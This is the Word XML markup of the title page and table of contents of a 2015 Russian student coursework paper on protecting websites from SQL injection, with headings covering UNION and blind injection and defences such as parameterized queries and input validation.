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1E" w:rsidRPr="003B32C2" w:rsidRDefault="00D3591E" w:rsidP="00D3591E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>МИНОБРНАУКИ РОССИИ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 xml:space="preserve">Федеральное государственное бюджетное образовательное </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="003B32C2" w:rsidRDefault="00D3591E" w:rsidP="00D3591E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>учреждение высшего профессионального образования</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«Ярославский государственный университет им. П.Г.Демидова»</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Кафедра компьютерной безопасности и</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="003B32C2" w:rsidRDefault="00D3591E" w:rsidP="00D3591E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>математических методов обработки информации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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Курсовая работа</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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:t>Защита от sql-инъекций web-сайтов и приложений.</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left="5400" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Научный руководитель</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="003B32C2" w:rsidRDefault="00830953" w:rsidP="00D3591E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:left="5400" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830953">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>старший преподаватель кафедры КБ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00830953">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ММОИ </w:t>
      </w:r>
      <w:r w:rsidR="00B93410">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>О.В. Власова</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left="5400" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Студент группы КБ-31СО</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="003B32C2" w:rsidRDefault="00D3591E" w:rsidP="00D3591E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind w:left="5400" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>С.А. Попов</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Ярославль 2015</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="172132631"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00EB5DBA" w:rsidRDefault="00EB5DBA">
          <w:pPr>
            <w:pStyle w:val="ab"/>
          </w:pPr>
          <w:r>
            <w:t>Оглавление</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00277DCB">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EB5DBA">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00277DCB">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc420854432" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854432 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854433" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sql-Инъекции</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854433 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854434" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Алгоритм выявления возможности внедрения </w:t>
            </w:r>
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854434 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854435" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Алгоритм внедрения </w:t>
            </w:r>
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода с помощью Union оператора</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854435 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854436" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Алгоритм внедрения sql-кода с помощью слепой инъекции</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854436 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854437" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Применение внедрения </w:t>
            </w:r>
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-кода на собственном приложении</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854437 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854438" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Способы предотвращения sql-инъекций</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854438 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854439" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>1) Использование параметризованных команд</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854439 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854440" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2) Использование хранимых процедур</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854440 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854441" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>3)Проверка всех данных, вводимых пользователем</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854441 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854442" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Список литературы</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854442 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009332E1" w:rsidRDefault="00277DCB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9679"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc420854443" w:history="1">
            <w:r w:rsidR="009332E1" w:rsidRPr="00E06777">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Приложение</w:t>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420854443 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009332E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
